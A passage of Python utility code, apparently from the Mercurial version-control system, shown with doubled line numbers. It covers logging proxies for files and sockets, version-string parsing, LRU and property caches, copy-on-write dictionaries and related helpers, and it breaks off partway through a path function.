824 824 if b'\n' not in data:
825 825 if self.logdataapis:
826 826 self.fh.write(b': %s\n' % stringutil.escapestr(data))
827 827 else:
828 828 self.fh.write(
829 829 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
830 830 )
831 831 self.fh.flush()
832 832 return
833 833
834 834 # Data with newlines is written to multiple lines.
835 835 if self.logdataapis:
836 836 self.fh.write(b':\n')
837 837
838 838 lines = data.splitlines(True)
839 839 for line in lines:
840 840 self.fh.write(
841 841 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
842 842 )
843 843 self.fh.flush()
844 844
845 845
846 846 class fileobjectobserver(baseproxyobserver):
847 847 """Logs file object activity."""
848 848
849 849 def __init__(
850 850 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
851 851 ):
852 852 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
853 853 self.reads = reads
854 854 self.writes = writes
855 855
856 856 def read(self, res, size=-1):
857 857 if not self.reads:
858 858 return
859 859 # Python 3 can return None from reads at EOF instead of empty strings.
860 860 if res is None:
861 861 res = b''
862 862
863 863 if size == -1 and res == b'':
864 864 # Suppress pointless read(-1) calls that return
865 865 # nothing. These happen _a lot_ on Python 3, and there
866 866 # doesn't seem to be a better workaround to have matching
867 867 # Python 2 and 3 behavior. :(
868 868 return
869 869
870 870 if self.logdataapis:
871 871 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
872 872
873 873 self._writedata(res)
874 874
875 875 def readline(self, res, limit=-1):
876 876 if not self.reads:
877 877 return
878 878
879 879 if self.logdataapis:
880 880 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
881 881
882 882 self._writedata(res)
883 883
884 884 def readinto(self, res, dest):
885 885 if not self.reads:
886 886 return
887 887
888 888 if self.logdataapis:
889 889 self.fh.write(
890 890 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
891 891 )
892 892
893 893 data = dest[0:res] if res is not None else b''
894 894
895 895 # _writedata() uses "in" operator and is confused by memoryview because
896 896 # characters are ints on Python 3.
897 897 if isinstance(data, memoryview):
898 898 data = data.tobytes()
899 899
900 900 self._writedata(data)
901 901
902 902 def write(self, res, data):
903 903 if not self.writes:
904 904 return
905 905
906 906 # Python 2 returns None from some write() calls. Python 3 (reasonably)
907 907 # returns the integer bytes written.
908 908 if res is None and data:
909 909 res = len(data)
910 910
911 911 if self.logdataapis:
912 912 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
913 913
914 914 self._writedata(data)
915 915
916 916 def flush(self, res):
917 917 if not self.writes:
918 918 return
919 919
920 920 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
921 921
922 922 # For observedbufferedinputpipe.
923 923 def bufferedread(self, res, size):
924 924 if not self.reads:
925 925 return
926 926
927 927 if self.logdataapis:
928 928 self.fh.write(
929 929 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
930 930 )
931 931
932 932 self._writedata(res)
933 933
934 934 def bufferedreadline(self, res):
935 935 if not self.reads:
936 936 return
937 937
938 938 if self.logdataapis:
939 939 self.fh.write(
940 940 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
941 941 )
942 942
943 943 self._writedata(res)
944 944
945 945
946 946 def makeloggingfileobject(
947 947 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
948 948 ):
949 949 """Turn a file object into a logging file object."""
950 950
951 951 observer = fileobjectobserver(
952 952 logh,
953 953 name,
954 954 reads=reads,
955 955 writes=writes,
956 956 logdata=logdata,
957 957 logdataapis=logdataapis,
958 958 )
959 959 return fileobjectproxy(fh, observer)
960 960
961 961
962 962 class socketobserver(baseproxyobserver):
963 963 """Logs socket activity."""
964 964
965 965 def __init__(
966 966 self,
967 967 fh,
968 968 name,
969 969 reads=True,
970 970 writes=True,
971 971 states=True,
972 972 logdata=False,
973 973 logdataapis=True,
974 974 ):
975 975 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
976 976 self.reads = reads
977 977 self.writes = writes
978 978 self.states = states
979 979
980 980 def makefile(self, res, mode=None, bufsize=None):
981 981 if not self.states:
982 982 return
983 983
984 984 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
985 985
986 986 def recv(self, res, size, flags=0):
987 987 if not self.reads:
988 988 return
989 989
990 990 if self.logdataapis:
991 991 self.fh.write(
992 992 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
993 993 )
994 994 self._writedata(res)
995 995
996 996 def recvfrom(self, res, size, flags=0):
997 997 if not self.reads:
998 998 return
999 999
1000 1000 if self.logdataapis:
1001 1001 self.fh.write(
1002 1002 b'%s> recvfrom(%d, %d) -> %d'
1003 1003 % (self.name, size, flags, len(res[0]))
1004 1004 )
1005 1005
1006 1006 self._writedata(res[0])
1007 1007
1008 1008 def recvfrom_into(self, res, buf, size, flags=0):
1009 1009 if not self.reads:
1010 1010 return
1011 1011
1012 1012 if self.logdataapis:
1013 1013 self.fh.write(
1014 1014 b'%s> recvfrom_into(%d, %d) -> %d'
1015 1015 % (self.name, size, flags, res[0])
1016 1016 )
1017 1017
1018 1018 self._writedata(buf[0 : res[0]])
1019 1019
1020 1020 def recv_into(self, res, buf, size=0, flags=0):
1021 1021 if not self.reads:
1022 1022 return
1023 1023
1024 1024 if self.logdataapis:
1025 1025 self.fh.write(
1026 1026 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1027 1027 )
1028 1028
1029 1029 self._writedata(buf[0:res])
1030 1030
1031 1031 def send(self, res, data, flags=0):
1032 1032 if not self.writes:
1033 1033 return
1034 1034
1035 1035 self.fh.write(
1036 1036 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1037 1037 )
1038 1038 self._writedata(data)
1039 1039
1040 1040 def sendall(self, res, data, flags=0):
1041 1041 if not self.writes:
1042 1042 return
1043 1043
1044 1044 if self.logdataapis:
1045 1045 # Returns None on success. So don't bother reporting return value.
1046 1046 self.fh.write(
1047 1047 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1048 1048 )
1049 1049
1050 1050 self._writedata(data)
1051 1051
1052 1052 def sendto(self, res, data, flagsoraddress, address=None):
1053 1053 if not self.writes:
1054 1054 return
1055 1055
1056 1056 if address:
1057 1057 flags = flagsoraddress
1058 1058 else:
1059 1059 flags = 0
1060 1060
1061 1061 if self.logdataapis:
1062 1062 self.fh.write(
1063 1063 b'%s> sendto(%d, %d, %r) -> %d'
1064 1064 % (self.name, len(data), flags, address, res)
1065 1065 )
1066 1066
1067 1067 self._writedata(data)
1068 1068
1069 1069 def setblocking(self, res, flag):
1070 1070 if not self.states:
1071 1071 return
1072 1072
1073 1073 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1074 1074
1075 1075 def settimeout(self, res, value):
1076 1076 if not self.states:
1077 1077 return
1078 1078
1079 1079 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1080 1080
1081 1081 def gettimeout(self, res):
1082 1082 if not self.states:
1083 1083 return
1084 1084
1085 1085 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1086 1086
1087 1087 def setsockopt(self, res, level, optname, value):
1088 1088 if not self.states:
1089 1089 return
1090 1090
1091 1091 self.fh.write(
1092 1092 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1093 1093 % (self.name, level, optname, value, res)
1094 1094 )
1095 1095
1096 1096
1097 1097 def makeloggingsocket(
1098 1098 logh,
1099 1099 fh,
1100 1100 name,
1101 1101 reads=True,
1102 1102 writes=True,
1103 1103 states=True,
1104 1104 logdata=False,
1105 1105 logdataapis=True,
1106 1106 ):
1107 1107 """Turn a socket into a logging socket."""
1108 1108
1109 1109 observer = socketobserver(
1110 1110 logh,
1111 1111 name,
1112 1112 reads=reads,
1113 1113 writes=writes,
1114 1114 states=states,
1115 1115 logdata=logdata,
1116 1116 logdataapis=logdataapis,
1117 1117 )
1118 1118 return socketproxy(fh, observer)
1119 1119
1120 1120
1121 1121 def version():
1122 1122 """Return version information if available."""
1123 1123 try:
1124 1124 from . import __version__
1125 1125
1126 1126 return __version__.version
1127 1127 except ImportError:
1128 1128 return b'unknown'
1129 1129
1130 1130
1131 1131 def versiontuple(v=None, n=4):
1132 1132 """Parses a Mercurial version string into an N-tuple.
1133 1133
1134 1134 The version string to be parsed is specified with the ``v`` argument.
1135 1135 If it isn't defined, the current Mercurial version string will be parsed.
1136 1136
1137 1137 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1138 1138 returned values:
1139 1139
1140 1140 >>> v = b'3.6.1+190-df9b73d2d444'
1141 1141 >>> versiontuple(v, 2)
1142 1142 (3, 6)
1143 1143 >>> versiontuple(v, 3)
1144 1144 (3, 6, 1)
1145 1145 >>> versiontuple(v, 4)
1146 1146 (3, 6, 1, '190-df9b73d2d444')
1147 1147
1148 1148 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1149 1149 (3, 6, 1, '190-df9b73d2d444+20151118')
1150 1150
1151 1151 >>> v = b'3.6'
1152 1152 >>> versiontuple(v, 2)
1153 1153 (3, 6)
1154 1154 >>> versiontuple(v, 3)
1155 1155 (3, 6, None)
1156 1156 >>> versiontuple(v, 4)
1157 1157 (3, 6, None, None)
1158 1158
1159 1159 >>> v = b'3.9-rc'
1160 1160 >>> versiontuple(v, 2)
1161 1161 (3, 9)
1162 1162 >>> versiontuple(v, 3)
1163 1163 (3, 9, None)
1164 1164 >>> versiontuple(v, 4)
1165 1165 (3, 9, None, 'rc')
1166 1166
1167 1167 >>> v = b'3.9-rc+2-02a8fea4289b'
1168 1168 >>> versiontuple(v, 2)
1169 1169 (3, 9)
1170 1170 >>> versiontuple(v, 3)
1171 1171 (3, 9, None)
1172 1172 >>> versiontuple(v, 4)
1173 1173 (3, 9, None, 'rc+2-02a8fea4289b')
1174 1174
1175 1175 >>> versiontuple(b'4.6rc0')
1176 1176 (4, 6, None, 'rc0')
1177 1177 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1178 1178 (4, 6, None, 'rc0+12-425d55e54f98')
1179 1179 >>> versiontuple(b'.1.2.3')
1180 1180 (None, None, None, '.1.2.3')
1181 1181 >>> versiontuple(b'12.34..5')
1182 1182 (12, 34, None, '..5')
1183 1183 >>> versiontuple(b'1.2.3.4.5.6')
1184 1184 (1, 2, 3, '.4.5.6')
1185 1185 """
1186 1186 if not v:
1187 1187 v = version()
1188 1188 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1189 1189 if not m:
1190 1190 vparts, extra = b'', v
1191 1191 elif m.group(2):
1192 1192 vparts, extra = m.groups()
1193 1193 else:
1194 1194 vparts, extra = m.group(1), None
1195 1195
1196 1196 assert vparts is not None # help pytype
1197 1197
1198 1198 vints = []
1199 1199 for i in vparts.split(b'.'):
1200 1200 try:
1201 1201 vints.append(int(i))
1202 1202 except ValueError:
1203 1203 break
1204 1204 # (3, 6) -> (3, 6, None)
1205 1205 while len(vints) < 3:
1206 1206 vints.append(None)
1207 1207
1208 1208 if n == 2:
1209 1209 return (vints[0], vints[1])
1210 1210 if n == 3:
1211 1211 return (vints[0], vints[1], vints[2])
1212 1212 if n == 4:
1213 1213 return (vints[0], vints[1], vints[2], extra)
1214 1214
1215 1215
1216 1216 def cachefunc(func):
1217 1217 '''cache the result of function calls'''
1218 1218 # XXX doesn't handle keywords args
1219 1219 if func.__code__.co_argcount == 0:
1220 1220 listcache = []
1221 1221
1222 1222 def f():
1223 1223 if len(listcache) == 0:
1224 1224 listcache.append(func())
1225 1225 return listcache[0]
1226 1226
1227 1227 return f
1228 1228 cache = {}
1229 1229 if func.__code__.co_argcount == 1:
1230 1230 # we gain a small amount of time because
1231 1231 # we don't need to pack/unpack the list
1232 1232 def f(arg):
1233 1233 if arg not in cache:
1234 1234 cache[arg] = func(arg)
1235 1235 return cache[arg]
1236 1236
1237 1237 else:
1238 1238
1239 1239 def f(*args):
1240 1240 if args not in cache:
1241 1241 cache[args] = func(*args)
1242 1242 return cache[args]
1243 1243
1244 1244 return f
1245 1245
1246 1246
1247 1247 class cow(object):
1248 1248 """helper class to make copy-on-write easier
1249 1249
1250 1250 Call preparewrite before doing any writes.
1251 1251 """
1252 1252
1253 1253 def preparewrite(self):
1254 1254 """call this before writes, return self or a copied new object"""
1255 1255 if getattr(self, '_copied', 0):
1256 1256 self._copied -= 1
1257 1257 return self.__class__(self)
1258 1258 return self
1259 1259
1260 1260 def copy(self):
1261 1261 """always do a cheap copy"""
1262 1262 self._copied = getattr(self, '_copied', 0) + 1
1263 1263 return self
1264 1264
1265 1265
1266 1266 class sortdict(collections.OrderedDict):
1267 1267 '''a simple sorted dictionary
1268 1268
1269 1269 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1270 1270 >>> d2 = d1.copy()
1271 1271 >>> d2
1272 1272 sortdict([('a', 0), ('b', 1)])
1273 1273 >>> d2.update([(b'a', 2)])
1274 1274 >>> list(d2.keys()) # should still be in last-set order
1275 1275 ['b', 'a']
1276 1276 >>> d1.insert(1, b'a.5', 0.5)
1277 1277 >>> d1
1278 1278 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1279 1279 '''
1280 1280
1281 1281 def __setitem__(self, key, value):
1282 1282 if key in self:
1283 1283 del self[key]
1284 1284 super(sortdict, self).__setitem__(key, value)
1285 1285
1286 1286 if pycompat.ispypy:
1287 1287 # __setitem__() isn't called as of PyPy 5.8.0
1288 1288 def update(self, src):
1289 1289 if isinstance(src, dict):
1290 1290 src = pycompat.iteritems(src)
1291 1291 for k, v in src:
1292 1292 self[k] = v
1293 1293
1294 1294 def insert(self, position, key, value):
1295 1295 for (i, (k, v)) in enumerate(list(self.items())):
1296 1296 if i == position:
1297 1297 self[key] = value
1298 1298 if i >= position:
1299 1299 del self[k]
1300 1300 self[k] = v
1301 1301
1302 1302
1303 1303 class cowdict(cow, dict):
1304 1304 """copy-on-write dict
1305 1305
1306 1306 Be sure to call d = d.preparewrite() before writing to d.
1307 1307
1308 1308 >>> a = cowdict()
1309 1309 >>> a is a.preparewrite()
1310 1310 True
1311 1311 >>> b = a.copy()
1312 1312 >>> b is a
1313 1313 True
1314 1314 >>> c = b.copy()
1315 1315 >>> c is a
1316 1316 True
1317 1317 >>> a = a.preparewrite()
1318 1318 >>> b is a
1319 1319 False
1320 1320 >>> a is a.preparewrite()
1321 1321 True
1322 1322 >>> c = c.preparewrite()
1323 1323 >>> b is c
1324 1324 False
1325 1325 >>> b is b.preparewrite()
1326 1326 True
1327 1327 """
1328 1328
1329 1329
1330 1330 class cowsortdict(cow, sortdict):
1331 1331 """copy-on-write sortdict
1332 1332
1333 1333 Be sure to call d = d.preparewrite() before writing to d.
1334 1334 """
1335 1335
1336 1336
1337 1337 class transactional(object): # pytype: disable=ignored-metaclass
1338 1338 """Base class for making a transactional type into a context manager."""
1339 1339
1340 1340 __metaclass__ = abc.ABCMeta
1341 1341
1342 1342 @abc.abstractmethod
1343 1343 def close(self):
1344 1344 """Successfully closes the transaction."""
1345 1345
1346 1346 @abc.abstractmethod
1347 1347 def release(self):
1348 1348 """Marks the end of the transaction.
1349 1349
1350 1350 If the transaction has not been closed, it will be aborted.
1351 1351 """
1352 1352
1353 1353 def __enter__(self):
1354 1354 return self
1355 1355
1356 1356 def __exit__(self, exc_type, exc_val, exc_tb):
1357 1357 try:
1358 1358 if exc_type is None:
1359 1359 self.close()
1360 1360 finally:
1361 1361 self.release()
1362 1362
1363 1363
1364 1364 @contextlib.contextmanager
1365 1365 def acceptintervention(tr=None):
1366 1366 """A context manager that closes the transaction on InterventionRequired
1367 1367
1368 1368 If no transaction was provided, this simply runs the body and returns
1369 1369 """
1370 1370 if not tr:
1371 1371 yield
1372 1372 return
1373 1373 try:
1374 1374 yield
1375 1375 tr.close()
1376 1376 except error.InterventionRequired:
1377 1377 tr.close()
1378 1378 raise
1379 1379 finally:
1380 1380 tr.release()
1381 1381
1382 1382
1383 1383 @contextlib.contextmanager
1384 1384 def nullcontextmanager():
1385 1385 yield
1386 1386
1387 1387
1388 1388 class _lrucachenode(object):
1389 1389 """A node in a doubly linked list.
1390 1390
1391 1391 Holds a reference to nodes on either side as well as a key-value
1392 1392 pair for the dictionary entry.
1393 1393 """
1394 1394
1395 1395 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1396 1396
1397 1397 def __init__(self):
1398 1398 self.next = None
1399 1399 self.prev = None
1400 1400
1401 1401 self.key = _notset
1402 1402 self.value = None
1403 1403 self.cost = 0
1404 1404
1405 1405 def markempty(self):
1406 1406 """Mark the node as emptied."""
1407 1407 self.key = _notset
1408 1408 self.value = None
1409 1409 self.cost = 0
1410 1410
1411 1411
1412 1412 class lrucachedict(object):
1413 1413 """Dict that caches most recent accesses and sets.
1414 1414
1415 1415 The dict consists of an actual backing dict - indexed by original
1416 1416 key - and a doubly linked circular list defining the order of entries in
1417 1417 the cache.
1418 1418
1419 1419 The head node is the newest entry in the cache. If the cache is full,
1420 1420 we recycle head.prev and make it the new head. Cache accesses result in
1421 1421 the node being moved to before the existing head and being marked as the
1422 1422 new head node.
1423 1423
1424 1424 Items in the cache can be inserted with an optional "cost" value. This is
1425 1425 simply an integer that is specified by the caller. The cache can be queried
1426 1426 for the total cost of all items presently in the cache.
1427 1427
1428 1428 The cache can also define a maximum cost. If a cache insertion would
1429 1429 cause the total cost of the cache to go beyond the maximum cost limit,
1430 1430 nodes will be evicted to make room for the new code. This can be used
1431 1431 to e.g. set a max memory limit and associate an estimated bytes size
1432 1432 cost to each item in the cache. By default, no maximum cost is enforced.
1433 1433 """
1434 1434
1435 1435 def __init__(self, max, maxcost=0):
1436 1436 self._cache = {}
1437 1437
1438 1438 self._head = head = _lrucachenode()
1439 1439 head.prev = head
1440 1440 head.next = head
1441 1441 self._size = 1
1442 1442 self.capacity = max
1443 1443 self.totalcost = 0
1444 1444 self.maxcost = maxcost
1445 1445
1446 1446 def __len__(self):
1447 1447 return len(self._cache)
1448 1448
1449 1449 def __contains__(self, k):
1450 1450 return k in self._cache
1451 1451
1452 1452 def __iter__(self):
1453 1453 # We don't have to iterate in cache order, but why not.
1454 1454 n = self._head
1455 1455 for i in range(len(self._cache)):
1456 1456 yield n.key
1457 1457 n = n.next
1458 1458
1459 1459 def __getitem__(self, k):
1460 1460 node = self._cache[k]
1461 1461 self._movetohead(node)
1462 1462 return node.value
1463 1463
1464 1464 def insert(self, k, v, cost=0):
1465 1465 """Insert a new item in the cache with optional cost value."""
1466 1466 node = self._cache.get(k)
1467 1467 # Replace existing value and mark as newest.
1468 1468 if node is not None:
1469 1469 self.totalcost -= node.cost
1470 1470 node.value = v
1471 1471 node.cost = cost
1472 1472 self.totalcost += cost
1473 1473 self._movetohead(node)
1474 1474
1475 1475 if self.maxcost:
1476 1476 self._enforcecostlimit()
1477 1477
1478 1478 return
1479 1479
1480 1480 if self._size < self.capacity:
1481 1481 node = self._addcapacity()
1482 1482 else:
1483 1483 # Grab the last/oldest item.
1484 1484 node = self._head.prev
1485 1485
1486 1486 # At capacity. Kill the old entry.
1487 1487 if node.key is not _notset:
1488 1488 self.totalcost -= node.cost
1489 1489 del self._cache[node.key]
1490 1490
1491 1491 node.key = k
1492 1492 node.value = v
1493 1493 node.cost = cost
1494 1494 self.totalcost += cost
1495 1495 self._cache[k] = node
1496 1496 # And mark it as newest entry. No need to adjust order since it
1497 1497 # is already self._head.prev.
1498 1498 self._head = node
1499 1499
1500 1500 if self.maxcost:
1501 1501 self._enforcecostlimit()
1502 1502
1503 1503 def __setitem__(self, k, v):
1504 1504 self.insert(k, v)
1505 1505
1506 1506 def __delitem__(self, k):
1507 1507 self.pop(k)
1508 1508
1509 1509 def pop(self, k, default=_notset):
1510 1510 try:
1511 1511 node = self._cache.pop(k)
1512 1512 except KeyError:
1513 1513 if default is _notset:
1514 1514 raise
1515 1515 return default
1516 1516
1517 1517 assert node is not None # help pytype
1518 1518 value = node.value
1519 1519 self.totalcost -= node.cost
1520 1520 node.markempty()
1521 1521
1522 1522 # Temporarily mark as newest item before re-adjusting head to make
1523 1523 # this node the oldest item.
1524 1524 self._movetohead(node)
1525 1525 self._head = node.next
1526 1526
1527 1527 return value
1528 1528
1529 1529 # Additional dict methods.
1530 1530
1531 1531 def get(self, k, default=None):
1532 1532 try:
1533 1533 return self.__getitem__(k)
1534 1534 except KeyError:
1535 1535 return default
1536 1536
1537 1537 def peek(self, k, default=_notset):
1538 1538 """Get the specified item without moving it to the head
1539 1539
1540 1540 Unlike get(), this doesn't mutate the internal state. But be aware
1541 1541 that it doesn't mean peek() is thread safe.
1542 1542 """
1543 1543 try:
1544 1544 node = self._cache[k]
1545 1545 return node.value
1546 1546 except KeyError:
1547 1547 if default is _notset:
1548 1548 raise
1549 1549 return default
1550 1550
1551 1551 def clear(self):
1552 1552 n = self._head
1553 1553 while n.key is not _notset:
1554 1554 self.totalcost -= n.cost
1555 1555 n.markempty()
1556 1556 n = n.next
1557 1557
1558 1558 self._cache.clear()
1559 1559
1560 1560 def copy(self, capacity=None, maxcost=0):
1561 1561 """Create a new cache as a copy of the current one.
1562 1562
1563 1563 By default, the new cache has the same capacity as the existing one.
1564 1564 But, the cache capacity can be changed as part of performing the
1565 1565 copy.
1566 1566
1567 1567 Items in the copy have an insertion/access order matching this
1568 1568 instance.
1569 1569 """
1570 1570
1571 1571 capacity = capacity or self.capacity
1572 1572 maxcost = maxcost or self.maxcost
1573 1573 result = lrucachedict(capacity, maxcost=maxcost)
1574 1574
1575 1575 # We copy entries by iterating in oldest-to-newest order so the copy
1576 1576 # has the correct ordering.
1577 1577
1578 1578 # Find the first non-empty entry.
1579 1579 n = self._head.prev
1580 1580 while n.key is _notset and n is not self._head:
1581 1581 n = n.prev
1582 1582
1583 1583 # We could potentially skip the first N items when decreasing capacity.
1584 1584 # But let's keep it simple unless it is a performance problem.
1585 1585 for i in range(len(self._cache)):
1586 1586 result.insert(n.key, n.value, cost=n.cost)
1587 1587 n = n.prev
1588 1588
1589 1589 return result
1590 1590
1591 1591 def popoldest(self):
1592 1592 """Remove the oldest item from the cache.
1593 1593
1594 1594 Returns the (key, value) describing the removed cache entry.
1595 1595 """
1596 1596 if not self._cache:
1597 1597 return
1598 1598
1599 1599 # Walk the linked list backwards starting at tail node until we hit
1600 1600 # a non-empty node.
1601 1601 n = self._head.prev
1602 1602 while n.key is _notset:
1603 1603 n = n.prev
1604 1604
1605 1605 assert n is not None # help pytype
1606 1606
1607 1607 key, value = n.key, n.value
1608 1608
1609 1609 # And remove it from the cache and mark it as empty.
1610 1610 del self._cache[n.key]
1611 1611 self.totalcost -= n.cost
1612 1612 n.markempty()
1613 1613
1614 1614 return key, value
1615 1615
1616 1616 def _movetohead(self, node):
1617 1617 """Mark a node as the newest, making it the new head.
1618 1618
1619 1619 When a node is accessed, it becomes the freshest entry in the LRU
1620 1620 list, which is denoted by self._head.
1621 1621
1622 1622 Visually, let's make ``N`` the new head node (* denotes head):
1623 1623
1624 1624 previous/oldest <-> head <-> next/next newest
1625 1625
1626 1626 ----<->--- A* ---<->-----
1627 1627 | |
1628 1628 E <-> D <-> N <-> C <-> B
1629 1629
1630 1630 To:
1631 1631
1632 1632 ----<->--- N* ---<->-----
1633 1633 | |
1634 1634 E <-> D <-> C <-> B <-> A
1635 1635
1636 1636 This requires the following moves:
1637 1637
1638 1638 C.next = D (node.prev.next = node.next)
1639 1639 D.prev = C (node.next.prev = node.prev)
1640 1640 E.next = N (head.prev.next = node)
1641 1641 N.prev = E (node.prev = head.prev)
1642 1642 N.next = A (node.next = head)
1643 1643 A.prev = N (head.prev = node)
1644 1644 """
1645 1645 head = self._head
1646 1646 # C.next = D
1647 1647 node.prev.next = node.next
1648 1648 # D.prev = C
1649 1649 node.next.prev = node.prev
1650 1650 # N.prev = E
1651 1651 node.prev = head.prev
1652 1652 # N.next = A
1653 1653 # It is tempting to do just "head" here, however if node is
1654 1654 # adjacent to head, this will do bad things.
1655 1655 node.next = head.prev.next
1656 1656 # E.next = N
1657 1657 node.next.prev = node
1658 1658 # A.prev = N
1659 1659 node.prev.next = node
1660 1660
1661 1661 self._head = node
1662 1662
1663 1663 def _addcapacity(self):
1664 1664 """Add a node to the circular linked list.
1665 1665
1666 1666 The new node is inserted before the head node.
1667 1667 """
1668 1668 head = self._head
1669 1669 node = _lrucachenode()
1670 1670 head.prev.next = node
1671 1671 node.prev = head.prev
1672 1672 node.next = head
1673 1673 head.prev = node
1674 1674 self._size += 1
1675 1675 return node
1676 1676
1677 1677 def _enforcecostlimit(self):
1678 1678 # This should run after an insertion. It should only be called if total
1679 1679 # cost limits are being enforced.
1680 1680 # The most recently inserted node is never evicted.
1681 1681 if len(self) <= 1 or self.totalcost <= self.maxcost:
1682 1682 return
1683 1683
1684 1684 # This is logically equivalent to calling popoldest() until we
1685 1685 # free up enough cost. We don't do that since popoldest() needs
1686 1686 # to walk the linked list and doing this in a loop would be
1687 1687 # quadratic. So we find the first non-empty node and then
1688 1688 # walk nodes until we free up enough capacity.
1689 1689 #
1690 1690 # If we only removed the minimum number of nodes to free enough
1691 1691 # cost at insert time, chances are high that the next insert would
1692 1692 # also require pruning. This would effectively constitute quadratic
1693 1693 # behavior for insert-heavy workloads. To mitigate this, we set a
1694 1694 # target cost that is a percentage of the max cost. This will tend
1695 1695 # to free more nodes when the high water mark is reached, which
1696 1696 # lowers the chances of needing to prune on the subsequent insert.
1697 1697 targetcost = int(self.maxcost * 0.75)
1698 1698
1699 1699 n = self._head.prev
1700 1700 while n.key is _notset:
1701 1701 n = n.prev
1702 1702
1703 1703 while len(self) > 1 and self.totalcost > targetcost:
1704 1704 del self._cache[n.key]
1705 1705 self.totalcost -= n.cost
1706 1706 n.markempty()
1707 1707 n = n.prev
1708 1708
1709 1709
1710 1710 def lrucachefunc(func):
1711 1711 '''cache most recent results of function calls'''
1712 1712 cache = {}
1713 1713 order = collections.deque()
1714 1714 if func.__code__.co_argcount == 1:
1715 1715
1716 1716 def f(arg):
1717 1717 if arg not in cache:
1718 1718 if len(cache) > 20:
1719 1719 del cache[order.popleft()]
1720 1720 cache[arg] = func(arg)
1721 1721 else:
1722 1722 order.remove(arg)
1723 1723 order.append(arg)
1724 1724 return cache[arg]
1725 1725
1726 1726 else:
1727 1727
1728 1728 def f(*args):
1729 1729 if args not in cache:
1730 1730 if len(cache) > 20:
1731 1731 del cache[order.popleft()]
1732 1732 cache[args] = func(*args)
1733 1733 else:
1734 1734 order.remove(args)
1735 1735 order.append(args)
1736 1736 return cache[args]
1737 1737
1738 1738 return f
1739 1739
1740 1740
1741 1741 class propertycache(object):
1742 1742 def __init__(self, func):
1743 1743 self.func = func
1744 1744 self.name = func.__name__
1745 1745
1746 1746 def __get__(self, obj, type=None):
1747 1747 result = self.func(obj)
1748 1748 self.cachevalue(obj, result)
1749 1749 return result
1750 1750
1751 1751 def cachevalue(self, obj, value):
1752 1752 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1753 1753 obj.__dict__[self.name] = value
1754 1754
1755 1755
1756 1756 def clearcachedproperty(obj, prop):
1757 1757 '''clear a cached property value, if one has been set'''
1758 1758 prop = pycompat.sysstr(prop)
1759 1759 if prop in obj.__dict__:
1760 1760 del obj.__dict__[prop]
1761 1761
1762 1762
1763 1763 def increasingchunks(source, min=1024, max=65536):
1764 1764 '''return no less than min bytes per chunk while data remains,
1765 1765 doubling min after each chunk until it reaches max'''
1766 1766
1767 1767 def log2(x):
1768 1768 if not x:
1769 1769 return 0
1770 1770 i = 0
1771 1771 while x:
1772 1772 x >>= 1
1773 1773 i += 1
1774 1774 return i - 1
1775 1775
1776 1776 buf = []
1777 1777 blen = 0
1778 1778 for chunk in source:
1779 1779 buf.append(chunk)
1780 1780 blen += len(chunk)
1781 1781 if blen >= min:
1782 1782 if min < max:
1783 1783 min = min << 1
1784 1784 nmin = 1 << log2(blen)
1785 1785 if nmin > min:
1786 1786 min = nmin
1787 1787 if min > max:
1788 1788 min = max
1789 1789 yield b''.join(buf)
1790 1790 blen = 0
1791 1791 buf = []
1792 1792 if buf:
1793 1793 yield b''.join(buf)
1794 1794
1795 1795
1796 1796 def always(fn):
1797 1797 return True
1798 1798
1799 1799
1800 1800 def never(fn):
1801 1801 return False
1802 1802
1803 1803
1804 1804 def nogc(func):
1805 1805 """disable garbage collector
1806 1806
1807 1807 Python's garbage collector triggers a GC each time a certain number of
1808 1808 container objects (the number being defined by gc.get_threshold()) are
1809 1809 allocated even when marked not to be tracked by the collector. Tracking has
1810 1810 no effect on when GCs are triggered, only on what objects the GC looks
1811 1811 into. As a workaround, disable GC while building complex (huge)
1812 1812 containers.
1813 1813
1814 1814 This garbage collector issue have been fixed in 2.7. But it still affect
1815 1815 CPython's performance.
1816 1816 """
1817 1817
1818 1818 def wrapper(*args, **kwargs):
1819 1819 gcenabled = gc.isenabled()
1820 1820 gc.disable()
1821 1821 try:
1822 1822 return func(*args, **kwargs)
1823 1823 finally:
1824 1824 if gcenabled:
1825 1825 gc.enable()
1826 1826
1827 1827 return wrapper
1828 1828
1829 1829
1830 1830 if pycompat.ispypy:
1831 1831 # PyPy runs slower with gc disabled
1832 1832 nogc = lambda x: x
1833 1833
1834 1834
1835 1835 def pathto(root, n1, n2):
1836 1836 '''return the relative path from one place to another.
1837 1837 root should use os.sep to separate directories
1838 1838 n1 should use os.sep to separate directories
1839 1839 n2 should use "/" to separate directories
1840 1840 returns an os.sep-separated path.
1841 1841
1842 1842 If n1 is a relative path, it's assumed it's
1843 1843 relative to root.
1844 1844 n2 should always be relative to root.
1845 1845 '''
1846 1846 if not n1:
1847 1847 return localpath(n2)
1848 1848 if os.path.isabs(n1):
